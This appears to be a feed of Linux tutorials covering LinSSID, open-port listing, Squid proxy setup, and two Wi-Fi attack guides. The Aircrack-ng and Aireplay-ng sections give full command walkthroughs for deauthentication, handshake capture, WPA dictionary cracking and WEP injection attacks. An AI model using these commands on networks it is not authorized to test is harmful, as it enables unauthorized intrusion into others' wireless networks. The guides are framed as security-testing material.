We all want to find the best-suited wireless channel for our Wi-Fi network. The most recommended way is to configure your router to automatically determine the optimal channel number based on periodic frequency analysis. However, there are also ways to scan the Wi-Fi networks within range of your network adapter yourself and determine the optimal channel.

With the help of modern utilities, it’s easy to measure the Wi-Fi signal from an access point in any room. One of these utilities is LinSSID. It is an open-source Wi-Fi analyzer tool written in C++ using Linux wireless tools and Qt4, Qt5, Qwt 6.1, etc. It has a graphical interface that shows nearby wireless routers and ad-hoc connections. The LinSSID interface is similar in appearance and functionality to the Windows Wi-Fi network analyzer inSSIDer.

By default, the Ubuntu network manager identifies all wireless networks and allows you to connect to one manually. However, with the help of this utility, you can also inspect the nearby networks along with the radio channels they use. Moreover, this app not only informs you about the strength of your own Wi-Fi network but also about the strength and frequency of other Wi-Fi signals. This information allows you to choose the least congested radio channel and to check the strength of radio signals in different places in your home.

Features:

  • Display details of locally receivable access points in a tabular form.
  • The scan speed can be adjusted as needed, with real-time updates.
  • Provide details with columns regarding many different options.
  • Graphically demonstrates signal strength by channel and overtime.
  • Displayed columns can be customized and are portable.
  • Displays AP bandwidth.
  • User-friendly.

Installation:

There are various ways for LinSSID installation. You can either install LinSSID from the source packages available on the LinSSID page, or you can use PPA for DEB-based systems like Ubuntu and LinuxMint, etc. In this tutorial, we will use PPA for LinSSID installation.

For this purpose, you will need to add LinSSID PPA by typing

ubuntu@ubuntu:~$ sudo add-apt-repository ppa:wseverin/ppa

Now update Ubuntu and install LinSSID:

ubuntu@ubuntu:~$ sudo apt-get update
ubuntu@ubuntu:~$ sudo apt install linssid -y

LinSSID uses wireless tools that require root privileges. You can either run it as root or launch it as an ordinary user through the gksudo program.

To run it as an ordinary user, you must first configure sudo using visudo and then launch LinSSID through gksudo.

ubuntu$ubuntu:~$ sudo visudo

We will use visudo as root to configure the file /etc/sudoers. Add the “user ALL=/usr/bin/linssid” line at the end of the file to allow that user to run LinSSID with root privileges.
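
For example, if the ordinary user’s account were named “alice” (a hypothetical username), the line added at the end of /etc/sudoers would be:

alice ALL=/usr/bin/linssid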

Now start LinSSID using command “gksudo linssid”.

It’s recommended not to edit the file directly, as visudo performs a syntax check before saving the configuration.

You can also launch the program from the menu. Once run, it will prompt for the password.

Once it’s launched, choose the interface with which you connect to your wireless network.

Now click the Play button to search for all the available Wi-Fi networks within your computer’s range. The graphical interface displays a wide range of information, including:

  • SSID
  • MAC Address
  • Channel
  • Signal Strength
  • Protocol
  • Speed
  • Noise
  • Security (if it is encrypted)
  • Frequency, etc

It’s important to note that not all the above information is available by default. Go to the main menu and click View to enable/disable fields as per your requirement. In addition, it also allows switching between Wi-Fi devices and altering automatic scanning intervals.

Now use the tool to check the signal levels at various locations in your home. You can also check the signal level of neighboring LANs. Then choose the channel that has the maximum strength and is used by the fewest routers. The main functionality of this application is that it locates and measures the strength of each wireless network from your device. Hence, it gives you a lot of control and choice over which network to connect to.

Another advantage it provides is its compatibility with most of the GPS cards. Thus it shows the location of all available wireless networks, which combined with signal power analysis allows network managers to locate any network errors. However, you need to have GPS and Wi-Fi cards to utilize the GPS features and use this application.

Conclusion:

In this article, we have covered the basic working of LinSSID, a Wi-Fi analysis utility for Unix-like systems. This user-friendly tool offers wireless scanning and Wi-Fi performance analysis on Linux. Its interface is simple and functional, as all the essential options are apparent at a glance. It is well suited for selecting appropriate wireless network channels and can be of great help to network managers in locating signal problems. According to its developers, it is developed for Ubuntu 12.04 and later and supports 64-bit versions. You can also have a look at some open-source alternatives for comparison.

]]>
How to Find Open Ports on Ubuntu? https://linuxhint.com/how-to-find-open-ports-on-ubuntu/ Mon, 14 Dec 2020 23:27:31 +0000 https://linuxhint.com/?p=81693 To troubleshoot a network and maintain the security of the server, a network administrator or a security professional must be aware of the tools used to find open ports on the server. Linux provides different utilities and command line options to list open ports on the server. In this tutorial, we are going to see how we can list all the open ports using different commands in the Ubuntu terminal.

What Does Open Port Mean?

Before going deeper into checking open ports, let’s first define what an open port means. An open port, or listening port, is a port on which some application is listening. The running application listens on that port, and we can communicate with the application over it. If an application is running on a port and we try to run another application on the same port, the kernel will throw an error. That is one of many reasons we check for open ports before running applications.

List Open Ports Using nmap

Network Mapper, known as nmap, is a free and open-source tool used to scan ports on a system. It is used to find vulnerabilities, discover networks, and find open ports. In this section, we will use nmap to get a list of open ports on a system. First of all, update the package cache on Ubuntu before installing nmap:

ubuntu@ubuntu:~$ sudo apt-get update -y

Nmap can be installed using the following command in the terminal:

ubuntu@ubuntu:~$ sudo apt-get install nmap -y

After installing nmap, verify the installation by checking the version of the nmap:

ubuntu@ubuntu:~$ nmap --version

If it shows the version of nmap, then it is installed properly; otherwise, run the above commands again to install nmap. Nmap can perform several network-related tasks, and port scanning is one of them. The nmap tool is used with many options. We can get the list of all the available options by using the following command:

ubuntu@ubuntu:~$ man nmap

So, to scan your localhost, use the command below:

ubuntu@ubuntu:~$ sudo nmap localhost

It will list all the open ports on localhost, as displayed in the above image. We can also use nmap to scan remote hosts:

ubuntu@ubuntu:~$ sudo nmap 93.184.216.34

Also, we can use the hostname of the remote server instead of an IP address:

ubuntu@ubuntu:~$ sudo nmap www.example.com

The nmap command can also be used to scan a range of IP addresses. Specify the range of IP Addresses in the command, as in the command below:

ubuntu@ubuntu:~$ sudo nmap 192.168.1.1-10

The above command will scan all the IP addresses from 192.168.1.1 to 192.168.1.10, and it will display the result in the terminal. To scan ports on a subnet, we can use nmap as follows:

ubuntu@ubuntu:~$ sudo nmap 192.168.1.1/24

The above command will scan all the hosts with IP addresses in the subnet defined in the command.

Sometimes you have to scan ports on random hosts, which are in different subnets and are not in sequence, then the best solution is to write a hosts file in which all the hostnames are written, separated by one or more spaces, tabs, or new lines. This file can be used with nmap as follows:

ubuntu@ubuntu:~$ sudo nmap -iL hosts.txt
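
For example, a hypothetical hosts.txt could contain entries like the following (IP addresses, hostnames, and CIDR ranges are all accepted):

192.168.1.15
server1.example.com 10.0.3.7
10.0.5.0/24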

We can use nmap to scan a single port on the system by specifying the port using the ‘-p’ flag, along with nmap, as in the following command:

ubuntu@ubuntu:~$ sudo nmap -p 80 localhost

Range of ports can also be scanned on a system using nmap in the following way:

ubuntu@ubuntu:~$ sudo nmap -p 80-85 localhost

We can scan all the ports of a system using nmap:

ubuntu@ubuntu:~$ sudo nmap -p- localhost

To get a list of the most commonly open ports on your system, you can use the nmap command with the ‘-F’ flag:

ubuntu@ubuntu:~$ sudo nmap -F localhost

TCP ports can be scanned on the system using nmap by adding the ‘-sT’ flag to the nmap command:

ubuntu@ubuntu:~$ sudo nmap -sT localhost

Similarly, for UDP ports, you can use the ‘-sU’ flag with the nmap command:

ubuntu@ubuntu:~$ sudo nmap -sU localhost

List Open Ports Using lsof

The lsof command, short for ‘list open files’, is used to get information about open files used by different processes on UNIX- and Linux-like operating systems. On most Linux distros, this tool comes pre-installed. We can verify the installation of lsof by checking its version:

ubuntu@ubuntu:~$ lsof -v

If it does not show the version, then lsof is not installed by default. We can still install it using the following commands in the terminal:

ubuntu@ubuntu:~$ sudo apt-get update -y
ubuntu@ubuntu:~$ sudo apt-get install lsof

We can use the lsof command along with different options. The list of all the available options can be displayed using the following command in the terminal:

ubuntu@ubuntu:~$ man lsof

Now, in this section, we are going to use lsof to display ports of a system in different ways:

ubuntu@ubuntu:~$ sudo lsof -i

The above command displays all open network connections. We can also use the lsof command to display all listening sockets:

ubuntu@ubuntu:~$ sudo lsof -n -P | grep LISTEN

We can list filtered ports based on a protocol using lsof. Run the command given below to list all the TCP Connection types:

ubuntu@ubuntu:~$ sudo lsof -i tcp

Similarly, we can list all the UDP connection types using lsof in the following way:

ubuntu@ubuntu:~$ sudo lsof -i udp

List Open Ports Using netstat

Netstat, short for network statistics, is a command-line program used to display detailed information about networks. It displays both incoming and outgoing TCP connections, routing tables, network interfaces, etc. In this section, we will use netstat to list open ports on a system. The netstat tool can be installed by running the following commands:

ubuntu@ubuntu:~$ sudo apt-get update -y
ubuntu@ubuntu:~$ sudo apt-get install net-tools -y

After running the above commands, you can verify the installation by checking the netstat version:

ubuntu@ubuntu:~$ netstat --version

If it displays the version of net-tools, then the installation is fine, otherwise, run the installation commands again. To get an overview of all the available options that can be used, along with the netstat command, run the following command:

ubuntu@ubuntu:~$ man netstat

We can get a list of all the listening ports using the netstat command in Ubuntu by running the following command:

ubuntu@ubuntu:~$ sudo netstat -l

The netstat command can also filter for listening TCP and UDP ports by adding a flag. To list listening TCP ports:

ubuntu@ubuntu:~$ sudo netstat -lt

To list listening UDP ports, use the following command:

ubuntu@ubuntu:~$ sudo netstat -lu

To get the list of all listening UNIX domain sockets, you can run the following command in the terminal:

ubuntu@ubuntu:~$ sudo netstat -lx

List Open Ports Using ss

The ss command is used to display information about sockets in a Linux system. It displays more detailed information about sockets than the netstat command. The ss command comes pre-installed for most of the Linux distros, so you do not need to install it before using it. You can get a list of all the options, which can be used along with the ss command, by running the ‘man’ command with ss:

ubuntu@ubuntu:~$ man ss

To get a list of all the connections regardless of their state, use the ss command without any flag:

ubuntu@ubuntu:~$ sudo ss

To get a list of all the listening ports, use the ss command with the ‘-l’ flag. The ‘-l’ flag is used to display only listening ports:

ubuntu@ubuntu:~$ sudo ss -l

To get all the listening TCP ports, we can use the ‘-t’ and ‘-l’ flag along with the ss command:

ubuntu@ubuntu:~$ sudo ss -lt

Similarly, we can get a list of all the listening UDP ports using the ss command along with the ‘-u’ and ‘-l’ flag:

ubuntu@ubuntu:~$ sudo ss -lu

The ss command can also be used to get a list of all the connections with the source or the destination port. In the following example, we are going to get the list of all the connections with the destination or source port 22:

ubuntu@ubuntu:~$ sudo ss -at '( dport = :22 or sport = :22 )'

You will get a list of all the inbound and outgoing connections if you have connected to a remote system using ssh.

Conclusion

For system administrators, security professionals, and other IT professionals, it is important to be aware of the open ports on their servers. Linux provides many tools that are helpful for diagnosing networks and for various other networking activities. In this tutorial, we used tools like netstat, ss, lsof, and nmap to check for open ports on Ubuntu. After going through this article, you should be able to list the listening ports on your Linux server in several ways.

]]>
How to Use Aircrack-ng https://linuxhint.com/how_to_aircrack_ng/ Mon, 14 Dec 2020 02:28:17 +0000 https://linuxhint.com/?p=79899 Most of the time, people never think about the network to which they are connected. They never think how secure that network is and how much they risk their confidential data on a daily basis. You can run vulnerability checks on your Wi-Fi networks by using a very powerful tool called Aircrack-ng, together with Wireshark. Wireshark is used to monitor network activity, while Aircrack-ng is a more aggressive tool that lets you attack and gain access to wireless connections. Thinking like an intruder has always been the safest way to protect yourself against an attack. By learning about Aircrack-ng, you will be able to grasp the exact steps an intruder would take to gain access to your system. You can then conduct compliance checks on your own system to ensure that it is not insecure.

Aircrack-ng is a complete suite of software designed to test Wi-Fi network security. It is not just a single tool but a collection of tools, each of which performs a particular task. Different areas of Wi-Fi security can be worked on, like monitoring the access point, testing, attacking the network, cracking the Wi-Fi key, and so on. Aircrack’s key objective is to intercept packets and decipher hashes to break passwords. It supports nearly all the newer wireless interfaces. Aircrack-ng is an improved version of the outdated tool suite Aircrack; “ng” refers to the New Generation. Below are some of the tools that work together to carry out a bigger task.

Airmon-ng:

Airmon-ng is included in the aircrack-ng kit and places the network interface card in monitor mode. Network cards will usually only accept packets targeted at them, as defined by the NIC’s MAC address, but with airmon-ng, all wireless packets will be accepted, whether they are targeted at the card or not. You should be able to catch these packets without associating or authenticating with the access point. Airmon-ng is used to check the status of an access point by putting the network interface in monitor mode. First, configure the wireless card to turn on monitor mode, then kill any background processes that may interfere with it. After terminating the processes, monitor mode can be enabled on the wireless interface by running the command below:

ubuntu@ubuntu:~$ sudo airmon-ng start wlan0 #<network interface name>
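
If background processes such as NetworkManager or wpa_supplicant interfere with monitor mode, airmon-ng itself can check for and kill them:

ubuntu@ubuntu:~$ sudo airmon-ng check kill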

You can also disable the monitor mode by stopping the airmon-ng anytime by using the command below:

ubuntu@ubuntu:~$ sudo airmon-ng stop wlan0 #<network interface name>

Airodump-ng:

Airodump-ng is used to list all the networks surrounding us and to view valuable information about them. The basic functionality of airodump-ng is to sniff packets, so it’s essentially programmed to grab all the packets around us while in monitor mode. We will run it against all connections around us and gather data like the number of clients connected to the network, their corresponding MAC addresses, the encryption type, and the channel numbers, and then start targeting our target network.

By typing the airodump-ng command and giving it the network interface name as the parameter, we can activate this tool. It will list all the access points, the number of data packets, the encryption and authentication methods used, and the name of the network (ESSID). From a hacking point of view, the MAC addresses are the most important fields.

ubuntu@ubuntu:~$ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack-ng is used for password cracking. After capturing all the packets using airodump-ng, we can crack the key with aircrack-ng. It cracks keys using two methods: PTW and FMS. The PTW approach is done in two phases: at first, only the ARP packets are used, and only if the key is not cracked after that search are all the other captured packets used. A plus point of the PTW approach is that not all the packets are needed for cracking. In the second approach, FMS, we use both statistical models and brute-force algorithms to crack the key. A dictionary method can also be used.

Aireplay-ng:

Aireplay-ng injects packets into a wireless network to create or accelerate traffic. Packets from two different sources can be replayed by aireplay-ng: the first is the live network, and the second is packets from an existing pcap file. Aireplay-ng is useful during a deauthentication attack that targets a wireless access point and a user. Moreover, you can perform attacks like the Caffe Latte attack with aireplay-ng, which allows you to recover a key from the client’s system. You can achieve this by catching an ARP packet, manipulating it, and sending it back to the client. The client will then create a packet that can be captured by airodump-ng, and aircrack-ng cracks the key from that modified packet. Some other attack options of aireplay-ng include chopchop, fragmentation, ARP request replay, etc.

Airbase-ng:

Airbase-ng is used to transform an intruder’s computer into a rogue access point for others to connect to. Using airbase-ng, you can pose as a legitimate access point and conduct man-in-the-middle attacks on computers that attach to your network. These kinds of attacks are called evil twin attacks. It is practically impossible for ordinary users to discern between a legitimate access point and a fake one, so the evil twin threat is among the most serious wireless threats we face today.

Airolib-ng:

Airolib-ng speeds up the cracking process by storing and managing password lists and access point ESSIDs. The database management system used by this program is SQLite3, which is available on almost all platforms. Password cracking includes the computation of the pairwise master key (PMK), from which the pairwise transient key (PTK) is derived. Using the PTK, you can determine the frame message integrity code (MIC) for a given packet and compare it against the MIC in the captured packet; if they match, the PTK was right, and therefore the PMK was right as well.

To see the password lists and access networks stored in the database, type the following command:

ubuntu@ubuntu:~$ sudo airolib-ng testdatabase --stats

Here, testdatabase is the database you want to access or create, and --stats is the operation you want to perform on it. You can perform multiple operations on the database fields, like giving maximum priority to some SSID. To use airolib-ng with aircrack-ng, enter the following command:

ubuntu@ubuntu:~$ sudo aircrack-ng -r testdatabase wpa2.eapol.cap

Here we are using the already computed PMKs stored in testdatabase to speed up the password cracking process.
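
The PMKs have to be imported and computed beforehand. A rough sketch of that workflow, assuming hypothetical essid.lst and password.lst files, looks like this:

ubuntu@ubuntu:~$ sudo airolib-ng testdatabase --import essid essid.lst
ubuntu@ubuntu:~$ sudo airolib-ng testdatabase --import passwd password.lst
ubuntu@ubuntu:~$ sudo airolib-ng testdatabase --batch

The --batch operation precomputes the PMKs for every ESSID/password combination stored in the database.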

Cracking WPA/WPA2 using Aircrack-ng:

Let’s look at a small example of what aircrack-ng can do with the help of a few of its awesome tools.  We will crack a WPA/WPA2 network’s pre-shared key using a dictionary method.

The first thing we need to do is to list out network interfaces that support monitor mode. This can be done using the following command:

ubuntu@ubuntu:~$ sudo airmon-ng

PHY    Interface                  Driver         Chipset

Phy0   wlx0                       rtl8xxxu       Realtek Semiconductor Corp.

We can see an interface; now, we have to put the network interface we have found ( wlx0 ) in monitor mode using the following command:

ubuntu@ubuntu:~$ sudo airmon-ng start wlx0

It has enabled monitor mode on the interface called wlx0mon.

Now we should start listening to broadcasts by nearby routers through our network interface we have put in monitor mode.

ubuntu@ubuntu:~$ sudo airodump-ng wlx0mon

CH  5 ][ Elapsed: 30 s ][ 2020-12-02 00:17

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

E4:6F:13:04:CE:31  -45       62       27    0   1  54e  WPA2 CCMP   PSK  CrackIt
C4:E9:84:76:10:BE  -63       77        0    0   6  54e. WPA2 CCMP   PSK  HAckme
C8:3A:35:A0:4E:01  -63       84        0    0   8  54e  WPA2 CCMP   PSK  Net07
74:DA:88:FA:38:02  -68       28        2    0  11  54e  WPA2 CCMP   PSK  TP-Link_3802

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

E4:6F:13:04:CE:31  5C:3A:45:D7:EA:8B   -3    0 - 1e     8        5
E4:6F:13:04:CE:31  D4:67:D3:C2:CD:D7  -33    1e- 6e     0        3
E4:6F:13:04:CE:31  5C:C3:07:56:61:EF  -35    0 - 1      0        6
E4:6F:13:04:CE:31  BC:91:B5:F8:7E:D5  -39    0e- 1   1002       13

Our target network is CrackIt in this case, which is currently running on channel 1.

Here in order to crack the password of the target network, we need to capture a 4-way handshake, which happens when a device tries to connect to a network. We can capture it by using the following command:

ubuntu@ubuntu:~$ sudo airodump-ng -c 1 --bssid E4:6F:13:04:CE:31 -w /home wlx0mon

-c      : Channel
--bssid : BSSID of the target network
-w      : The name of the directory where the capture file will be placed

Now we have to wait for a device to connect to the network, but there is a better way to capture a handshake: we can deauthenticate the connected devices from the AP with a deauthentication attack, using the following command:

ubuntu@ubuntu:~$ sudo aireplay-ng -0 0 -a E4:6F:13:04:CE:31 wlx0mon

-0 0 : deauthentication attack (a count of 0 keeps sending deauthentication packets until stopped)
-a   : BSSID of the target network

We have disconnected all the devices, and now we have to wait for a device to connect to the network.

CH  1 ][ Elapsed: 30 s ][ 2020-12-02 00:02 ][ WPA handshake: E4:6F:13:04:CE:31

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E

E4:6F:13:04:CE:31  -47   1      228      807   36   1  54e  WPA2 CCMP   PSK  P

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

E4:6F:13:04:CE:31  BC:91:B5:F8:7E:D5  -35    0 - 1      0        1
E4:6F:13:04:CE:31  5C:3A:45:D7:EA:8B  -29    0e- 1e     0       22
E4:6F:13:04:CE:31  88:28:B3:30:27:7E  -31    0e- 1      0       32
E4:6F:13:04:CE:31  D4:67:D3:C2:CD:D7  -35    0e- 6e   263      708  CrackIt
E4:6F:13:04:CE:31  D4:6A:6A:99:ED:E3  -35    0e- 0e     0       86
E4:6F:13:04:CE:31  5C:C3:07:56:61:EF  -37    0 - 1e     0        1

We got a hit: looking at the top-right corner right next to the time, we can see a handshake has been captured. Now look in the folder specified (/home in our case) for the captured “.cap” file.

In order to crack the WPA key, we can use the following command:

ubuntu@ubuntu:~$ sudo aircrack-ng -a2 -w rockyou.txt -b  E4:6F:13:04:CE:31 handshake.cap

-b            : BSSID of the target network
-a2           : WPA2 mode
rockyou.txt   : The dictionary file used
handshake.cap : The file which contains the captured handshake

Aircrack-ng 1.2 beta3

[00:01:49] 10566 keys tested (1017.96 k/s)

KEY FOUND! [ yougotme ]

Master Key    : 8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
                0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C

Transient Key : 4D C4 5R 6T 76 99 6G 7H 8D EC
                H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
                A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
                8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B

MAC           : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
The key to our target network has been cracked successfully.

Conclusion:

Wireless networks are everywhere, used by every company, from workers using smartphones to industrial control devices. According to research, more than 50 percent of internet traffic will travel over Wi-Fi in 2021. Wireless networks have many advantages: communication outdoors, quick internet access in places where it is almost impossible to lay wires, the ability to expand the network without installing cables for new users, and the ability to connect your mobile devices to your home office while you aren’t there.

Despite these advantages, there is a big question mark over your privacy and security. Because these networks are open to everyone within the transmitting range of the router, they can easily be attacked, and your data can easily be compromised. For example, if you are connected to some public Wi-Fi, anyone connected to that network can inspect your network traffic with a little know-how and the readily available tools, and even dump it.

]]>
How to Install and Setup Squid Proxy Server on Your Linux Server? https://linuxhint.com/install-and-setup-squid-proxy-server-on-linux-server/ Sun, 13 Dec 2020 21:08:02 +0000 https://linuxhint.com/?p=81286

Squid proxy is a web proxy application that can be installed and set up on Linux and other Unix-like operating systems. It is used to increase web browsing speed by caching website data, and for controlling web traffic, security, and DNS lookups. The squid proxy server acts as an intermediary between the client (web browsers, etc.) and the internet. It is compatible with the web protocols HTTP and HTTPS, as well as other protocols like FTP, WAIS, etc.

How to Install Squid Proxy?

To install squid proxy on Linux, first, update the system packages by executing the following command:

ubuntu@ubuntu:~$ sudo apt update

Once you have updated your system, you can install squid proxy by typing this command:

ubuntu@ubuntu:~$ sudo apt -y install squid

Squid proxy will be installed. To start and see the status of Squid proxy, execute these commands:

ubuntu@ubuntu:~$ sudo service squid start
ubuntu@ubuntu:~$ sudo service squid status

Configuration for Your Web Browser

Before you make any changes to the squid configuration file, you have to change some settings in your web browser. Open your web browser’s “network settings” and proceed to “proxy settings”. Click on “manual proxy configuration”, then enter the IP address of your squid proxy server in the HTTP proxy field along with the port number (by default, the squid proxy port is 3128). Now your web traffic will go through the squid proxy. You can check this by typing any URL in your web browser; it will give you an “access denied” error, and to allow access, we have to make changes in the squid configuration file.

Squid Proxy Configuration

The squid configuration file is located at “/etc/squid/squid.conf”.

ubuntu@ubuntu:~$ cd /etc/squid/

Make a copy of the “squid.conf” file as a backup before making changes to it.

ubuntu@ubuntu:~$ sudo cp /etc/squid/squid.conf /etc/squid/backup.conf

Now that a copy has been made as a backup file, we can make changes in the “squid.conf” file.

To open “squid.conf” file in vim, type this command:

ubuntu@ubuntu:~$ sudo vim /etc/squid/squid.conf

Go to the line http_access deny all.

Change it to:

http_access allow all

Now, check your web browser again, type any URL, and it should be working.

ACL (Access Control List)

Squid also allows you to control access to different websites (web traffic) by either allowing or blocking them. To do so, go to the line “acl CONNECT method CONNECT”.

And below this line, write the ACL (access control list) to block the websites you want.

acl block_websites dstdomain .facebook.com .youtube.com .etc.com

Then add a deny statement for it.

http_access deny block_websites

Save the changes; then, to check whether the websites are actually blocked, restart the squid service and try the URLs in your web browser.

ubuntu@ubuntu:~$ sudo service squid restart
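
If you would rather restrict the proxy to your own network instead of allowing everyone, a minimal sketch (assuming a hypothetical LAN of 192.168.1.0/24) would be:

acl localnet src 192.168.1.0/24
http_access allow localnet
http_access deny all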

You can also block a user from downloading specific files like audio and video files using ACL.

acl media_files urlpath_regex -i \.(mp3|mp4|flv|avi|mkv)$

It will prevent the user from downloading audio or video files with extensions like mp3, mp4, FLV, etc. Add any file extension you want to prevent from downloading. Now, below this line, write the deny statement.

http_access deny media_files

The media files will then be blocked from downloading.

Caching Web Pages

Proxy servers are also used to boost network performance by caching website data so pages load faster. You can change the directory where cached data is stored. Moreover, you can also change the cache size and the number of directories in which the data is saved.

To make changes, open “squid.conf” file and go to the following line:

#cache_dir ufs /opt/squid/var/cache/squid 100 16 256

This line will be commented by default, so uncomment this line by removing the # sign.

In the above line, there is a phrase “100 16 256”. The 100 is the cache size in megabytes, and you may change it to another size, like 300. The 16 is the number of first-level subdirectories in which the cache is stored, and 256 is the number of second-level subdirectories.

cache_dir ufs /opt/squid/var/cache/squid 300 20 260

You can also change the amount of memory Squid uses for caching objects in RAM by adding the following line in the “squid.conf” file:

cache_mem 300 MB

If you want to change the path of the cache file directory, type the following command:

ubuntu@ubuntu:~$ sudo mkdir -p /path/where/you/want/to/place/file

To change the ownership of the cache directory to squid proxy, you have to execute this command:

ubuntu@ubuntu:~$ sudo chown -R proxy:proxy /path/where/you/want/to/place/file

Now, stop the squid service using this command:

ubuntu@ubuntu:~$ sudo service squid stop

Then initialize the new cache directories by running this command:

ubuntu@ubuntu:~$ sudo squid -z

It will create the missing cache directories in the new cache location.

Now, start the squid service again using the command below:

ubuntu@ubuntu:~$ sudo service squid start

Conclusion

We have discussed how to install and configure Squid proxy. It is very simple and easy to use and has vast applications. Squid proxy is a very good tool that can be used in organizations or by small internet service providers to control web traffic and internet access. It boosts web browsing speed and provides security mechanisms for web traffic.

]]>
Aireplay-ng https://linuxhint.com/aireplay_ng/ Tue, 08 Dec 2020 01:19:53 +0000 https://linuxhint.com/?p=79915

Aireplay-ng is used to generate rogue Wireless traffic. It can be used along with aircrack-ng to crack WEP and WPA keys. The main purpose of aireplay-ng is to inject frames. There are several different types of powerful attacks that can be performed using aireplay-ng, such as the deauthentication attack, which helps in capturing WPA handshake data, or the fake authentication attack, in which packets are injected into the network access point by authenticating to it to create and capture new IVs. Other types of attacks are included in the following list:

  • Interactive packet replay attack
  • ARP request replay attack
  • KoreK chopchop attack
  • Cafe-latte attack
  • Fragmentation attack

Usage of aireplay-ng

Injection Test

Certain network cards do not support packet injection, and aireplay-ng only works with network cards that support this feature. The first thing to do before performing an attack is to check whether your network card supports injection. You can do this simply by running an injection test using the following command:

ubuntu@ubuntu:~$ sudo aireplay-ng -9 wlan0


-9    : Injection test (--test can also be used)
wlan0 : Network interface name

Here, you can see that we have found 1 AP (Access point), named PTCL-BB, the interface that is used, the ping time, and the channel it is running on. So, we can clearly determine by looking at the output that injection is working, and we are good to perform other attacks.

Deauthentication Attack

The deauthentication attack is used to send deauthentication packets to one or more clients who are connected to a given AP to deauthenticate the client(s). Deauthentication attacks can be performed for many different reasons, such as capturing WPA/WPA2 handshakes by forcing the victim to reauthenticate, recovering a hidden ESSID (hidden Wi-Fi name), generating ARP packets, etc. The following command is used to perform a deauthentication attack:

ubuntu@ubuntu:~$ sudo aireplay-ng -0 1 -a E4:6F:13:04:CE:31 -c cc:79:cf:d6:ac:fc wlan0

-0 : Deauthentication attack

1 : Number of deauthentication packets to send

-a : MAC address of AP (Wireless Router)

-c : MAC address of victim (if not specified, it will deauthenticate all the clients connected to the given AP)

wlan0 : Network interface name

As you can see, we have successfully deauthenticated the system with the given MAC address that was connected just a moment before. This deauthentication attack will force the specified client to disconnect and then reconnect again to capture the WPA handshake. This WPA handshake can be cracked by Aircrack-ng later on.

If you do not specify the ‘-c’ option in the above command, aireplay-ng will force every device on that Wireless router (AP) to disconnect by sending fake deauthentication packets.

Fake Authentication Attack (WEP)

Suppose that you need to inject packets into an AP (wireless router), but you do not have your client device associated or authenticated with it (this only works in the case of the WEP security protocol). APs maintain a list of all connected clients and devices and ignore any packet coming from any other source; they will not even bother to look at what is inside the packet. To tackle this issue, you authenticate your system to the given router or AP through a method called fake authentication. You can perform this action using the following commands:

ubuntu@ubuntu:~$ sudo aireplay-ng -1 0 -a E4:6F:13:04:CE:31 -h cc:70:cf:d8:ad:fc wlan0

-1 : Fake authentication attack (--fakeauth can also be used)

-a : Access Point MAC address

-h : MAC address of the device to which to perform fake authentication

wlan0 : Network interface name

In the above output, you will see that the authentication request was successful and the network has now become an open network for us. As you can see, the device is not connected to the given AP, but rather, authenticated to it. That means that packets can now be injected into the specified AP, as we are now authenticated, and it will receive any request we will send.

ARP Request Replay Attack (WEP)

The best and most reliable way to produce new initialization vectors is the ARP request replay attack. This type of attack waits and listens for an ARP packet and, on obtaining one, retransmits the packet back. It will continue to retransmit ARP packets again and again. In each case, a new IV is generated, which later helps in cracking or determining the WEP key. The following commands will be used to perform this attack:

ubuntu@ubuntu:~$ sudo aireplay-ng -3 -b E4:6F:13:04:CE:31 -h cc:70:cf:d8:ad:fc wlan0

-3 : ARP request replay attack (--arpreplay can also be used)

-b : MAC address of AP

-h : Source MAC address (the device that was fake-authenticated earlier)

wlan0 : Network interface name

Now, we will wait for an ARP packet from the Wireless AP. Then, we will capture the packet and re-inject it into the interface specified.

This produces a capture file of ARP packets that must be injected back, which can be done using the following command:

ubuntu@ubuntu:~$ sudo aireplay-ng -2 -r arp-0717-135835.cap wlan0

-2    : Interactive frame selection
-r    : Name of the file from the last successful packet replay
wlan0 : Network interface name

Here, airodump-ng will be started to capture the IVs, first putting the interface in monitor mode; meanwhile, the data should start increasing rapidly.

Fragmentation Attack (WEP)

A fragmentation attack is used to obtain 1500 bytes of PRGA (pseudo-random generation algorithm keystream), rather than a WEP key. These 1500 bytes are later used by packetforge-ng to perform various injection attacks. A minimum of one packet received from the AP is required to obtain these 1500 bytes (sometimes fewer bytes are recovered). The following commands are used to perform this type of attack:

ubuntu@ubuntu:~$ sudo aireplay-ng -5 -b E4:6F:13:04:CE:31 -h cc:70:cf:d8:ad:fc wlan0

-5 : Fragmentation attack

-b : MAC address of AP

-h : MAC address of the device from which packets will be injected

wlan0 : Network interface name


After capturing the packet, it will ask whether to use this packet to obtain the 1500 bytes of PRGA. Press Y to continue.

Now the 1500 bytes of PRGA have been successfully obtained. These bytes are stored in a file.
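
These keystream bytes can then be fed to packetforge-ng to forge packets for injection. A rough sketch of forging an ARP request (the fragment.xor keystream file name is a placeholder for the file saved by the fragmentation attack) looks like this:

ubuntu@ubuntu:~$ sudo packetforge-ng -0 -a E4:6F:13:04:CE:31 -h cc:70:cf:d8:ad:fc -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-request

Here, -0 forges an ARP packet, -k and -l set the destination and source IP addresses, -y reads the PRGA keystream obtained above, and -w writes the forged packet to a file that can later be replayed with aireplay-ng -2 -r arp-request.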

Conclusion

Aireplay-ng is a useful tool that helps in cracking WPA/WPA2-PSK and WEP keys by performing various powerful attacks on wireless networks. In this way, aireplay-ng generates important traffic data to be used later on. Aireplay-ng also comes with aircrack-ng, a very powerful software suite consisting of a detector, a sniffer, and WPA and WEP/WPS cracking and analysis tools.

]]>
How to Configure GUI on your EC2 Instance https://linuxhint.com/configure_gui_ec2_ubuntu/ Mon, 30 Nov 2020 15:46:22 +0000 https://linuxhint.com/?p=78743

